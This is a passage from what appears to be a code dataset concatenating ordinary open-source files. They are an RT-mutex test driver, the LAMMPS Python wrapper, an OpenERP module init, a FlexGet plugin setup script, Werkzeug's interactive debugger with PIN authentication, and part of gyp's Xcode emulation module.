cmd_opcodes = {
"schedother" : "1",
"schedfifo" : "2",
"lock" : "3",
"locknowait" : "4",
"lockint" : "5",
"lockintnowait" : "6",
"lockcont" : "7",
"unlock" : "8",
"signal" : "11",
"resetevent" : "98",
"reset" : "99",
}
test_opcodes = {
"prioeq" : ["P" , "eq" , None],
"priolt" : ["P" , "lt" , None],
"priogt" : ["P" , "gt" , None],
"nprioeq" : ["N" , "eq" , None],
"npriolt" : ["N" , "lt" , None],
"npriogt" : ["N" , "gt" , None],
"unlocked" : ["M" , "eq" , 0],
"trylock" : ["M" , "eq" , 1],
"blocked" : ["M" , "eq" , 2],
"blockedwake" : ["M" , "eq" , 3],
"locked" : ["M" , "eq" , 4],
"opcodeeq" : ["O" , "eq" , None],
"opcodelt" : ["O" , "lt" , None],
"opcodegt" : ["O" , "gt" , None],
"eventeq" : ["E" , "eq" , None],
"eventlt" : ["E" , "lt" , None],
"eventgt" : ["E" , "gt" , None],
}
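# Test line format (editor's addition, inferred from the parser below):
# each non-comment line is "cmd: opcode: threadid: data", e.g.
#     C: locknowait: 2: 0
# sends command 4 ("locknowait" on lock 0) to tester thread 2, while
#     W: locked: 2: 0
# polls thread 2's status until lock 0 reports state 4 ("locked").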
# Print usage information
def usage():
print "rt-tester.py <-c -h -q -t> <testfile>"
print " -c display comments after first command"
print " -h help"
print " -q quiet mode"
print " -t test mode (syntax check)"
print " testfile: read test specification from testfile"
print " otherwise from stdin"
return
# Print progress when not in quiet mode
def progress(str):
if not quiet:
print str
# Analyse a status value
def analyse(val, top, arg):
intval = int(val)
if top[0] == "M":
intval = intval / (10 ** int(arg))
intval = intval % 10
argval = top[2]
elif top[0] == "O":
argval = int(cmd_opcodes.get(arg, arg))
else:
argval = int(arg)
# progress("%d %s %d" %(intval, top[1], argval))
if top[1] == "eq" and intval == argval:
return 1
if top[1] == "lt" and intval < argval:
return 1
if top[1] == "gt" and intval > argval:
return 1
return 0
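# Worked example (editor's addition): for the "blocked" opcode above,
# test_opcodes["blocked"] == ["M", "eq", 2], so with arg "1" and a raw
# status value of 420, analyse() isolates the digit for lock 1 via
# (420 / 10**1) % 10 == 2 and returns 1 (match).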
# Parse the commandline
try:
(options, arguments) = getopt.getopt(sys.argv[1:],'chqt')
except getopt.GetoptError, ex:
usage()
sys.exit(1)
# Parse commandline options
for option, value in options:
if option == "-c":
comments = 1
elif option == "-q":
quiet = 1
elif option == "-t":
test = 1
elif option == '-h':
usage()
sys.exit(0)
# Select the input source
if arguments:
try:
fd = open(arguments[0])
except Exception,ex:
sys.stderr.write("File not found %s\n" %(arguments[0]))
sys.exit(1)
else:
fd = sys.stdin
linenr = 0
# Read the test patterns
while 1:
linenr = linenr + 1
line = fd.readline()
if not len(line):
break
line = line.strip()
parts = line.split(":")
if not parts or len(parts) < 1:
continue
if len(parts[0]) == 0:
continue
if parts[0].startswith("#"):
if comments > 1:
progress(line)
continue
if comments == 1:
comments = 2
progress(line)
cmd = parts[0].strip().lower()
opc = parts[1].strip().lower()
tid = parts[2].strip()
dat = parts[3].strip()
try:
# Test or wait for a status value
if cmd == "t" or cmd == "w":
testop = test_opcodes[opc]
fname = "%s%s%s" %(sysfsprefix, tid, statusfile)
if test:
print fname
continue
while 1:
query = 1
fsta = open(fname, 'r')
status = fsta.readline().strip()
fsta.close()
stat = status.split(",")
for s in stat:
s = s.strip()
if s.startswith(testop[0]):
# Separate status value
val = s[2:].strip()
query = analyse(val, testop, dat)
break
if query or cmd == "t":
break
progress(" " + status)
if not query:
sys.stderr.write("Test failed in line %d\n" %(linenr))
sys.exit(1)
# Issue a command to the tester
elif cmd == "c":
cmdnr = cmd_opcodes[opc]
# Build command string and sys filename
cmdstr = "%s:%s" %(cmdnr, dat)
fname = "%s%s%s" %(sysfsprefix, tid, commandfile)
if test:
print fname
continue
fcmd = open(fname, 'w')
fcmd.write(cmdstr)
fcmd.close()
except Exception,ex:
sys.stderr.write(str(ex))
sys.stderr.write("\nSyntax error in line %d\n" %(linenr))
if not test:
fd.close()
sys.exit(1)
# Normal exit pass
print "Pass"
sys.exit(0)
| gpl-2.0 |
jluissandovalm/smd_lammps | python/lammps.py | 4 | 6759 | # ----------------------------------------------------------------------
# LAMMPS - Large-scale Atomic/Molecular Massively Parallel Simulator
# http://lammps.sandia.gov, Sandia National Laboratories
# Steve Plimpton, sjplimp@sandia.gov
#
# Copyright (2003) Sandia Corporation. Under the terms of Contract
# DE-AC04-94AL85000 with Sandia Corporation, the U.S. Government retains
# certain rights in this software. This software is distributed under
# the GNU General Public License.
#
# See the README file in the top-level LAMMPS directory.
# -------------------------------------------------------------------------
# Python wrapper on LAMMPS library via ctypes
import sys,traceback,types
from ctypes import *
class lammps:
def __init__(self,name="",cmdargs=None,ptr=None):
# load liblammps.so by default
# if name = "g++", load liblammps_g++.so
try:
if not name: self.lib = CDLL("liblammps.so",RTLD_GLOBAL)
else: self.lib = CDLL("liblammps_%s.so" % name,RTLD_GLOBAL)
except:
type,value,tb = sys.exc_info()
traceback.print_exception(type,value,tb)
raise OSError,"Could not load LAMMPS dynamic library"
# if no ptr provided, create an instance of LAMMPS
# don't know how to pass an MPI communicator from PyPar
# no_mpi call lets LAMMPS use MPI_COMM_WORLD
# cargs = array of C strings from args
# if ptr, then are embedding Python in LAMMPS input script
# ptr is the desired instance of LAMMPS
# just convert it to ctypes ptr and store in self.lmp
if not ptr:
self.opened = 1
if cmdargs:
cmdargs.insert(0,"lammps.py")
narg = len(cmdargs)
cargs = (c_char_p*narg)(*cmdargs)
self.lmp = c_void_p()
self.lib.lammps_open_no_mpi(narg,cargs,byref(self.lmp))
else:
self.lmp = c_void_p()
self.lib.lammps_open_no_mpi(0,None,byref(self.lmp))
# could use just this if LAMMPS lib interface supported it
# self.lmp = self.lib.lammps_open_no_mpi(0,None)
else:
self.opened = 0
# magic to convert ptr to ctypes ptr
pythonapi.PyCObject_AsVoidPtr.restype = c_void_p
pythonapi.PyCObject_AsVoidPtr.argtypes = [py_object]
self.lmp = c_void_p(pythonapi.PyCObject_AsVoidPtr(ptr))
def __del__(self):
if self.lmp and self.opened: self.lib.lammps_close(self.lmp)
def close(self):
if self.opened: self.lib.lammps_close(self.lmp)
self.lmp = None
def file(self,file):
self.lib.lammps_file(self.lmp,file)
def command(self,cmd):
self.lib.lammps_command(self.lmp,cmd)
def extract_global(self,name,type):
if type == 0:
self.lib.lammps_extract_global.restype = POINTER(c_int)
elif type == 1:
self.lib.lammps_extract_global.restype = POINTER(c_double)
else: return None
ptr = self.lib.lammps_extract_global(self.lmp,name)
return ptr[0]
def extract_atom(self,name,type):
if type == 0:
self.lib.lammps_extract_atom.restype = POINTER(c_int)
elif type == 1:
self.lib.lammps_extract_atom.restype = POINTER(POINTER(c_int))
elif type == 2:
self.lib.lammps_extract_atom.restype = POINTER(c_double)
elif type == 3:
self.lib.lammps_extract_atom.restype = POINTER(POINTER(c_double))
else: return None
ptr = self.lib.lammps_extract_atom(self.lmp,name)
return ptr
def extract_compute(self,id,style,type):
if type == 0:
if style > 0: return None
self.lib.lammps_extract_compute.restype = POINTER(c_double)
ptr = self.lib.lammps_extract_compute(self.lmp,id,style,type)
return ptr[0]
if type == 1:
self.lib.lammps_extract_compute.restype = POINTER(c_double)
ptr = self.lib.lammps_extract_compute(self.lmp,id,style,type)
return ptr
if type == 2:
self.lib.lammps_extract_compute.restype = POINTER(POINTER(c_double))
ptr = self.lib.lammps_extract_compute(self.lmp,id,style,type)
return ptr
return None
# in case of global datum, free memory for 1 double via lammps_free()
# double was allocated by library interface function
def extract_fix(self,id,style,type,i=0,j=0):
if type == 0:
if style > 0: return None
self.lib.lammps_extract_fix.restype = POINTER(c_double)
ptr = self.lib.lammps_extract_fix(self.lmp,id,style,type,i,j)
result = ptr[0]
self.lib.lammps_free(ptr)
return result
if type == 1:
self.lib.lammps_extract_fix.restype = POINTER(c_double)
ptr = self.lib.lammps_extract_fix(self.lmp,id,style,type,i,j)
return ptr
if type == 2:
self.lib.lammps_extract_fix.restype = POINTER(POINTER(c_double))
ptr = self.lib.lammps_extract_fix(self.lmp,id,style,type,i,j)
return ptr
return None
# free memory for 1 double or 1 vector of doubles via lammps_free()
# for vector, must copy nlocal returned values to local c_double vector
# memory was allocated by library interface function
def extract_variable(self,name,group,type):
if type == 0:
self.lib.lammps_extract_variable.restype = POINTER(c_double)
ptr = self.lib.lammps_extract_variable(self.lmp,name,group)
result = ptr[0]
self.lib.lammps_free(ptr)
return result
if type == 1:
self.lib.lammps_extract_global.restype = POINTER(c_int)
nlocalptr = self.lib.lammps_extract_global(self.lmp,"nlocal")
nlocal = nlocalptr[0]
result = (c_double*nlocal)()
self.lib.lammps_extract_variable.restype = POINTER(c_double)
ptr = self.lib.lammps_extract_variable(self.lmp,name,group)
for i in xrange(nlocal): result[i] = ptr[i]
self.lib.lammps_free(ptr)
return result
return None
# set variable value
# value is converted to string
# returns 0 for success, -1 if failed
def set_variable(self,name,value):
return self.lib.lammps_set_variable(self.lmp,name,str(value))
# return total number of atoms in system
def get_natoms(self):
return self.lib.lammps_get_natoms(self.lmp)
# return vector of atom properties gathered across procs, ordered by atom ID
def gather_atoms(self,name,type,count):
natoms = self.lib.lammps_get_natoms(self.lmp)
if type == 0:
data = ((count*natoms)*c_int)()
self.lib.lammps_gather_atoms(self.lmp,name,type,count,data)
elif type == 1:
data = ((count*natoms)*c_double)()
self.lib.lammps_gather_atoms(self.lmp,name,type,count,data)
else: return None
return data
# scatter vector of atom properties across procs, ordered by atom ID
# assume vector is of correct type and length, as created by gather_atoms()
def scatter_atoms(self,name,type,count,data):
self.lib.lammps_scatter_atoms(self.lmp,name,type,count,data)
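# Usage sketch (editor's addition; "in.demo" is a placeholder input script,
# and a LAMMPS shared library must be loadable as liblammps.so):
#
#     lmp = lammps()
#     lmp.file("in.demo")                  # run a LAMMPS input script
#     natoms = lmp.get_natoms()
#     x = lmp.gather_atoms("x", 1, 3)      # per-atom doubles, 3 per atom
#     x[0] += 0.1                          # shift atom 1's x coordinate
#     lmp.scatter_atoms("x", 1, 3, x)
#     lmp.command("run 100")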
| gpl-2.0 |
provaleks/o8 | addons/account_bank_statement_extensions/__init__.py | 442 | 1153 | # -*- encoding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
#
# Copyright (c) 2011 Noviat nv/sa (www.noviat.be). All rights reserved.
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
import account_bank_statement
import res_partner_bank
import report
import wizard
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
| agpl-3.0 |
verdel/flexget-lostfilm-plugin | setup.py | 1 | 1285 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
from setuptools import setup, find_packages
from codecs import open
from os import path
here = path.abspath(path.dirname(__file__))
# Parse the version from the lostfilm module.
with open('extras/__init__.py') as f:
for line in f:
if line.find("__version__") >= 0:
version = line.split("=")[1].strip()
version = version.strip('"')
version = version.strip("'")
continue
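# The loop above matches a line in extras/__init__.py of the form
# (editor's note, illustrative):
#     __version__ = '0.1.0'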
with open(path.join(here, 'README.md'), encoding='utf-8') as readme_file:
readme = readme_file.read()
with open(path.join(here, 'HISTORY.rst'), encoding='utf-8') as history_file:
history = history_file.read().replace('.. :changelog:', '')
requirements = [
'FlexGet>2.2'
]
setup(
name='Lostfilm-Flexget',
version=version,
description='Lostfilm FlexGet plugin',
long_description=readme + '\n\n' + history,
author='Vadim Aleksandrov',
author_email='valeksandrov@me.com',
url='https://github.com/verdel/flexget-lostfilm-plugin',
packages=find_packages(),
install_requires=requirements,
keywords='lostfilm, lostfilm.tv, flexget, plugin',
license='MIT',
entry_points="""
[FlexGet.plugins]
lostfilmtv = extras.input.lostfilmtv""",
)
| mit |
burzillibus/RobHome | venv/lib/python2.7/site-packages/werkzeug/debug/__init__.py | 90 | 17266 | # -*- coding: utf-8 -*-
"""
werkzeug.debug
~~~~~~~~~~~~~~
WSGI application traceback debugger.
:copyright: (c) 2014 by the Werkzeug Team, see AUTHORS for more details.
:license: BSD, see LICENSE for more details.
"""
import os
import re
import sys
import uuid
import json
import time
import getpass
import hashlib
import mimetypes
from itertools import chain
from os.path import join, dirname, basename, isfile
from werkzeug.wrappers import BaseRequest as Request, BaseResponse as Response
from werkzeug.http import parse_cookie
from werkzeug.debug.tbtools import get_current_traceback, render_console_html
from werkzeug.debug.console import Console
from werkzeug.security import gen_salt
from werkzeug._internal import _log
from werkzeug._compat import text_type
# DEPRECATED
#: import this here because it once was documented as being available
#: from this module. In case there are users left ...
from werkzeug.debug.repr import debug_repr # noqa
# A week
PIN_TIME = 60 * 60 * 24 * 7
def hash_pin(pin):
if isinstance(pin, text_type):
pin = pin.encode('utf-8', 'replace')
return hashlib.md5(pin + b'shittysalt').hexdigest()[:12]
_machine_id = None
def get_machine_id():
global _machine_id
rv = _machine_id
if rv is not None:
return rv
def _generate():
# Potential sources of secret information on linux. The machine-id
# is stable across boots, the boot id is not
for filename in '/etc/machine-id', '/proc/sys/kernel/random/boot_id':
try:
with open(filename, 'rb') as f:
return f.readline().strip()
except IOError:
continue
# On OS X we can use the computer's serial number assuming that
# ioreg exists and can spit out that information.
try:
# Also catch import errors: subprocess may not be available, e.g.
# Google App Engine
# See https://github.com/pallets/werkzeug/issues/925
from subprocess import Popen, PIPE
dump = Popen(['ioreg', '-c', 'IOPlatformExpertDevice', '-d', '2'],
stdout=PIPE).communicate()[0]
match = re.search(b'"serial-number" = <([^>]+)', dump)
if match is not None:
return match.group(1)
except (OSError, ImportError):
pass
# On Windows we can use winreg to get the machine guid
wr = None
try:
import winreg as wr
except ImportError:
try:
import _winreg as wr
except ImportError:
pass
if wr is not None:
try:
with wr.OpenKey(wr.HKEY_LOCAL_MACHINE,
'SOFTWARE\\Microsoft\\Cryptography', 0,
wr.KEY_READ | wr.KEY_WOW64_64KEY) as rk:
return wr.QueryValueEx(rk, 'MachineGuid')[0]
except WindowsError:
pass
_machine_id = rv = _generate()
return rv
class _ConsoleFrame(object):
"""Helper class so that we can reuse the frame console code for the
standalone console.
"""
def __init__(self, namespace):
self.console = Console(namespace)
self.id = 0
def get_pin_and_cookie_name(app):
"""Given an application object this returns a semi-stable 9 digit pin
code and a random key. The hope is that this is stable between
restarts to not make debugging particularly frustrating. If the pin
was forcefully disabled this returns `None`.
Second item in the resulting tuple is the cookie name for remembering.
"""
pin = os.environ.get('WERKZEUG_DEBUG_PIN')
rv = None
num = None
# Pin was explicitly disabled
if pin == 'off':
return None, None
# Pin was provided explicitly
if pin is not None and pin.replace('-', '').isdigit():
# If there are separators in the pin, return it directly
if '-' in pin:
rv = pin
else:
num = pin
modname = getattr(app, '__module__',
getattr(app.__class__, '__module__'))
try:
# `getpass.getuser()` imports the `pwd` module,
# which does not exist in the Google App Engine sandbox.
username = getpass.getuser()
except ImportError:
username = None
mod = sys.modules.get(modname)
# This information only exists to make the cookie unique on the
# computer, not as a security feature.
probably_public_bits = [
username,
modname,
getattr(app, '__name__', getattr(app.__class__, '__name__')),
getattr(mod, '__file__', None),
]
# This information is here to make it harder for an attacker to
# guess the cookie name. They are unlikely to be contained anywhere
# within the unauthenticated debug page.
private_bits = [
str(uuid.getnode()),
get_machine_id(),
]
h = hashlib.md5()
for bit in chain(probably_public_bits, private_bits):
if not bit:
continue
if isinstance(bit, text_type):
bit = bit.encode('utf-8')
h.update(bit)
h.update(b'cookiesalt')
cookie_name = '__wzd' + h.hexdigest()[:20]
# If we need to generate a pin we salt it a bit more so that we don't
    # end up with the same value, and generate our 9 digits
if num is None:
h.update(b'pinsalt')
num = ('%09d' % int(h.hexdigest(), 16))[:9]
# Format the pincode in groups of digits for easier remembering if
# we don't have a result yet.
if rv is None:
for group_size in 5, 4, 3:
if len(num) % group_size == 0:
rv = '-'.join(num[x:x + group_size].rjust(group_size, '0')
for x in range(0, len(num), group_size))
break
else:
rv = num
return rv, cookie_name
class DebuggedApplication(object):
"""Enables debugging support for a given application::
from werkzeug.debug import DebuggedApplication
from myapp import app
app = DebuggedApplication(app, evalex=True)
The `evalex` keyword argument allows evaluating expressions in a
traceback's frame context.
.. versionadded:: 0.9
The `lodgeit_url` parameter was deprecated.
:param app: the WSGI application to run debugged.
:param evalex: enable exception evaluation feature (interactive
debugging). This requires a non-forking server.
    :param request_key: The key that points to the request object in the
environment. This parameter is ignored in current
versions.
:param console_path: the URL for a general purpose console.
:param console_init_func: the function that is executed before starting
the general purpose console. The return value
is used as initial namespace.
:param show_hidden_frames: by default hidden traceback frames are skipped.
You can show them by setting this parameter
to `True`.
:param pin_security: can be used to disable the pin based security system.
:param pin_logging: enables the logging of the pin system.
"""
def __init__(self, app, evalex=False, request_key='werkzeug.request',
console_path='/console', console_init_func=None,
show_hidden_frames=False, lodgeit_url=None,
pin_security=True, pin_logging=True):
if lodgeit_url is not None:
from warnings import warn
warn(DeprecationWarning('Werkzeug now pastes into gists.'))
if not console_init_func:
console_init_func = None
self.app = app
self.evalex = evalex
self.frames = {}
self.tracebacks = {}
self.request_key = request_key
self.console_path = console_path
self.console_init_func = console_init_func
self.show_hidden_frames = show_hidden_frames
self.secret = gen_salt(20)
self._failed_pin_auth = 0
self.pin_logging = pin_logging
if pin_security:
# Print out the pin for the debugger on standard out.
if os.environ.get('WERKZEUG_RUN_MAIN') == 'true' and \
pin_logging:
_log('warning', ' * Debugger is active!')
if self.pin is None:
_log('warning', ' * Debugger PIN disabled. '
'DEBUGGER UNSECURED!')
else:
_log('info', ' * Debugger PIN: %s' % self.pin)
else:
self.pin = None
def _get_pin(self):
if not hasattr(self, '_pin'):
self._pin, self._pin_cookie = get_pin_and_cookie_name(self.app)
return self._pin
def _set_pin(self, value):
self._pin = value
pin = property(_get_pin, _set_pin)
del _get_pin, _set_pin
@property
def pin_cookie_name(self):
"""The name of the pin cookie."""
if not hasattr(self, '_pin_cookie'):
self._pin, self._pin_cookie = get_pin_and_cookie_name(self.app)
return self._pin_cookie
def debug_application(self, environ, start_response):
"""Run the application and conserve the traceback frames."""
app_iter = None
try:
app_iter = self.app(environ, start_response)
for item in app_iter:
yield item
if hasattr(app_iter, 'close'):
app_iter.close()
except Exception:
if hasattr(app_iter, 'close'):
app_iter.close()
traceback = get_current_traceback(
skip=1, show_hidden_frames=self.show_hidden_frames,
ignore_system_exceptions=True)
for frame in traceback.frames:
self.frames[frame.id] = frame
self.tracebacks[traceback.id] = traceback
try:
start_response('500 INTERNAL SERVER ERROR', [
('Content-Type', 'text/html; charset=utf-8'),
# Disable Chrome's XSS protection, the debug
# output can cause false-positives.
('X-XSS-Protection', '0'),
])
except Exception:
# if we end up here there has been output but an error
# occurred. in that situation we can do nothing fancy any
# more, better log something into the error log and fall
# back gracefully.
environ['wsgi.errors'].write(
'Debugging middleware caught exception in streamed '
'response at a point where response headers were already '
'sent.\n')
else:
is_trusted = bool(self.check_pin_trust(environ))
yield traceback.render_full(evalex=self.evalex,
evalex_trusted=is_trusted,
secret=self.secret) \
.encode('utf-8', 'replace')
traceback.log(environ['wsgi.errors'])
def execute_command(self, request, command, frame):
"""Execute a command in a console."""
return Response(frame.console.eval(command), mimetype='text/html')
def display_console(self, request):
"""Display a standalone shell."""
if 0 not in self.frames:
if self.console_init_func is None:
ns = {}
else:
ns = dict(self.console_init_func())
ns.setdefault('app', self.app)
self.frames[0] = _ConsoleFrame(ns)
is_trusted = bool(self.check_pin_trust(request.environ))
return Response(render_console_html(secret=self.secret,
evalex_trusted=is_trusted),
mimetype='text/html')
def paste_traceback(self, request, traceback):
"""Paste the traceback and return a JSON response."""
rv = traceback.paste()
return Response(json.dumps(rv), mimetype='application/json')
def get_resource(self, request, filename):
"""Return a static resource from the shared folder."""
filename = join(dirname(__file__), 'shared', basename(filename))
if isfile(filename):
mimetype = mimetypes.guess_type(filename)[0] \
or 'application/octet-stream'
f = open(filename, 'rb')
try:
return Response(f.read(), mimetype=mimetype)
finally:
f.close()
return Response('Not Found', status=404)
def check_pin_trust(self, environ):
"""Checks if the request passed the pin test. This returns `True` if the
request is trusted on a pin/cookie basis and returns `False` if not.
Additionally if the cookie's stored pin hash is wrong it will return
`None` so that appropriate action can be taken.
"""
if self.pin is None:
return True
val = parse_cookie(environ).get(self.pin_cookie_name)
if not val or '|' not in val:
return False
ts, pin_hash = val.split('|', 1)
if not ts.isdigit():
return False
if pin_hash != hash_pin(self.pin):
return None
return (time.time() - PIN_TIME) < int(ts)
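    # Worked example (editor's addition): pin_auth() below stores the cookie
    # value "%s|%s" % (int(time.time()), hash_pin(self.pin)), e.g.
    # "1500000000|<12-char-md5-prefix>"; check_pin_trust() accepts it until
    # PIN_TIME (one week) elapses or the stored pin hash no longer matches.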
def _fail_pin_auth(self):
time.sleep(self._failed_pin_auth > 5 and 5.0 or 0.5)
self._failed_pin_auth += 1
def pin_auth(self, request):
"""Authenticates with the pin."""
exhausted = False
auth = False
trust = self.check_pin_trust(request.environ)
# If the trust return value is `None` it means that the cookie is
# set but the stored pin hash value is bad. This means that the
# pin was changed. In this case we count a bad auth and unset the
# cookie. This way it becomes harder to guess the cookie name
# instead of the pin as we still count up failures.
bad_cookie = False
if trust is None:
self._fail_pin_auth()
bad_cookie = True
# If we're trusted, we're authenticated.
elif trust:
auth = True
# If we failed too many times, then we're locked out.
elif self._failed_pin_auth > 10:
exhausted = True
# Otherwise go through pin based authentication
else:
            entered_pin = request.args.get('pin', '')
if entered_pin.strip().replace('-', '') == \
self.pin.replace('-', ''):
self._failed_pin_auth = 0
auth = True
else:
self._fail_pin_auth()
rv = Response(json.dumps({
'auth': auth,
'exhausted': exhausted,
}), mimetype='application/json')
if auth:
rv.set_cookie(self.pin_cookie_name, '%s|%s' % (
int(time.time()),
hash_pin(self.pin)
), httponly=True)
elif bad_cookie:
rv.delete_cookie(self.pin_cookie_name)
return rv
def log_pin_request(self):
"""Log the pin if needed."""
if self.pin_logging and self.pin is not None:
_log('info', ' * To enable the debugger you need to '
'enter the security pin:')
_log('info', ' * Debugger pin code: %s' % self.pin)
return Response('')
def __call__(self, environ, start_response):
"""Dispatch the requests."""
# important: don't ever access a function here that reads the incoming
# form data! Otherwise the application won't have access to that data
# any more!
request = Request(environ)
response = self.debug_application
if request.args.get('__debugger__') == 'yes':
cmd = request.args.get('cmd')
arg = request.args.get('f')
secret = request.args.get('s')
traceback = self.tracebacks.get(request.args.get('tb', type=int))
frame = self.frames.get(request.args.get('frm', type=int))
if cmd == 'resource' and arg:
response = self.get_resource(request, arg)
elif cmd == 'paste' and traceback is not None and \
secret == self.secret:
response = self.paste_traceback(request, traceback)
elif cmd == 'pinauth' and secret == self.secret:
response = self.pin_auth(request)
elif cmd == 'printpin' and secret == self.secret:
response = self.log_pin_request()
elif self.evalex and cmd is not None and frame is not None \
and self.secret == secret and \
self.check_pin_trust(environ):
response = self.execute_command(request, cmd, frame)
elif self.evalex and self.console_path is not None and \
request.path == self.console_path:
response = self.display_console(request)
return response(environ, start_response)
| mit |
wacrea/DBStatusREST-nodejs | node_modules/npm/node_modules/node-gyp/gyp/pylib/gyp/xcode_emulation.py | 13 | 52358 | # Copyright (c) 2012 Google Inc. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""
This module contains classes that help to emulate xcodebuild behavior on top of
other build systems, such as make and ninja.
"""
import copy
import gyp.common
import os.path
import re
import shlex
import subprocess
import sys
from gyp.common import GypError
class XcodeSettings(object):
"""A class that understands the gyp 'xcode_settings' object."""
# Populated lazily by _SdkPath(). Shared by all XcodeSettings, so cached
# at class-level for efficiency.
_sdk_path_cache = {}
# Populated lazily by GetExtraPlistItems(). Shared by all XcodeSettings, so
# cached at class-level for efficiency.
_plist_cache = {}
# Populated lazily by GetIOSPostbuilds. Shared by all XcodeSettings, so
# cached at class-level for efficiency.
_codesigning_key_cache = {}
def __init__(self, spec):
self.spec = spec
self.isIOS = False
# Per-target 'xcode_settings' are pushed down into configs earlier by gyp.
# This means self.xcode_settings[config] always contains all settings
# for that config -- the per-target settings as well. Settings that are
# the same for all configs are implicitly per-target settings.
self.xcode_settings = {}
configs = spec['configurations']
for configname, config in configs.iteritems():
self.xcode_settings[configname] = config.get('xcode_settings', {})
self._ConvertConditionalKeys(configname)
if self.xcode_settings[configname].get('IPHONEOS_DEPLOYMENT_TARGET',
None):
self.isIOS = True
# This is only non-None temporarily during the execution of some methods.
self.configname = None
# Used by _AdjustLibrary to match .a and .dylib entries in libraries.
self.library_re = re.compile(r'^lib([^/]+)\.(a|dylib)$')
def _ConvertConditionalKeys(self, configname):
"""Converts or warns on conditional keys. Xcode supports conditional keys,
such as CODE_SIGN_IDENTITY[sdk=iphoneos*]. This is a partial implementation
with some keys converted while the rest force a warning."""
settings = self.xcode_settings[configname]
conditional_keys = [key for key in settings if key.endswith(']')]
for key in conditional_keys:
# If you need more, speak up at http://crbug.com/122592
if key.endswith("[sdk=iphoneos*]"):
if configname.endswith("iphoneos"):
new_key = key.split("[")[0]
settings[new_key] = settings[key]
else:
print 'Warning: Conditional keys not implemented, ignoring:', \
' '.join(conditional_keys)
del settings[key]
def _Settings(self):
assert self.configname
return self.xcode_settings[self.configname]
def _Test(self, test_key, cond_key, default):
return self._Settings().get(test_key, default) == cond_key
def _Appendf(self, lst, test_key, format_str, default=None):
if test_key in self._Settings():
lst.append(format_str % str(self._Settings()[test_key]))
elif default:
lst.append(format_str % str(default))
def _WarnUnimplemented(self, test_key):
if test_key in self._Settings():
print 'Warning: Ignoring not yet implemented key "%s".' % test_key
def _IsBundle(self):
return int(self.spec.get('mac_bundle', 0)) != 0
def GetFrameworkVersion(self):
"""Returns the framework version of the current target. Only valid for
bundles."""
assert self._IsBundle()
return self.GetPerTargetSetting('FRAMEWORK_VERSION', default='A')
def GetWrapperExtension(self):
"""Returns the bundle extension (.app, .framework, .plugin, etc). Only
valid for bundles."""
assert self._IsBundle()
if self.spec['type'] in ('loadable_module', 'shared_library'):
default_wrapper_extension = {
'loadable_module': 'bundle',
'shared_library': 'framework',
}[self.spec['type']]
wrapper_extension = self.GetPerTargetSetting(
'WRAPPER_EXTENSION', default=default_wrapper_extension)
return '.' + self.spec.get('product_extension', wrapper_extension)
elif self.spec['type'] == 'executable':
return '.' + self.spec.get('product_extension', 'app')
else:
assert False, "Don't know extension for '%s', target '%s'" % (
self.spec['type'], self.spec['target_name'])
def GetProductName(self):
"""Returns PRODUCT_NAME."""
return self.spec.get('product_name', self.spec['target_name'])
def GetFullProductName(self):
"""Returns FULL_PRODUCT_NAME."""
if self._IsBundle():
return self.GetWrapperName()
else:
return self._GetStandaloneBinaryPath()
def GetWrapperName(self):
"""Returns the directory name of the bundle represented by this target.
Only valid for bundles."""
assert self._IsBundle()
return self.GetProductName() + self.GetWrapperExtension()
def GetBundleContentsFolderPath(self):
"""Returns the qualified path to the bundle's contents folder. E.g.
Chromium.app/Contents or Foo.bundle/Versions/A. Only valid for bundles."""
if self.isIOS:
return self.GetWrapperName()
assert self._IsBundle()
if self.spec['type'] == 'shared_library':
return os.path.join(
self.GetWrapperName(), 'Versions', self.GetFrameworkVersion())
else:
# loadable_modules have a 'Contents' folder like executables.
return os.path.join(self.GetWrapperName(), 'Contents')
def GetBundleResourceFolder(self):
"""Returns the qualified path to the bundle's resource folder. E.g.
Chromium.app/Contents/Resources. Only valid for bundles."""
assert self._IsBundle()
if self.isIOS:
return self.GetBundleContentsFolderPath()
return os.path.join(self.GetBundleContentsFolderPath(), 'Resources')
def GetBundlePlistPath(self):
"""Returns the qualified path to the bundle's plist file. E.g.
Chromium.app/Contents/Info.plist. Only valid for bundles."""
assert self._IsBundle()
if self.spec['type'] in ('executable', 'loadable_module'):
return os.path.join(self.GetBundleContentsFolderPath(), 'Info.plist')
else:
return os.path.join(self.GetBundleContentsFolderPath(),
'Resources', 'Info.plist')
def GetProductType(self):
"""Returns the PRODUCT_TYPE of this target."""
if self._IsBundle():
return {
'executable': 'com.apple.product-type.application',
'loadable_module': 'com.apple.product-type.bundle',
'shared_library': 'com.apple.product-type.framework',
}[self.spec['type']]
else:
return {
'executable': 'com.apple.product-type.tool',
'loadable_module': 'com.apple.product-type.library.dynamic',
'shared_library': 'com.apple.product-type.library.dynamic',
'static_library': 'com.apple.product-type.library.static',
}[self.spec['type']]
def GetMachOType(self):
"""Returns the MACH_O_TYPE of this target."""
# Weird, but matches Xcode.
if not self._IsBundle() and self.spec['type'] == 'executable':
return ''
return {
'executable': 'mh_execute',
'static_library': 'staticlib',
'shared_library': 'mh_dylib',
'loadable_module': 'mh_bundle',
}[self.spec['type']]
def _GetBundleBinaryPath(self):
"""Returns the name of the bundle binary of by this target.
E.g. Chromium.app/Contents/MacOS/Chromium. Only valid for bundles."""
assert self._IsBundle()
if self.spec['type'] in ('shared_library') or self.isIOS:
path = self.GetBundleContentsFolderPath()
elif self.spec['type'] in ('executable', 'loadable_module'):
path = os.path.join(self.GetBundleContentsFolderPath(), 'MacOS')
return os.path.join(path, self.GetExecutableName())
def _GetStandaloneExecutableSuffix(self):
if 'product_extension' in self.spec:
return '.' + self.spec['product_extension']
return {
'executable': '',
'static_library': '.a',
'shared_library': '.dylib',
'loadable_module': '.so',
}[self.spec['type']]
def _GetStandaloneExecutablePrefix(self):
return self.spec.get('product_prefix', {
'executable': '',
'static_library': 'lib',
'shared_library': 'lib',
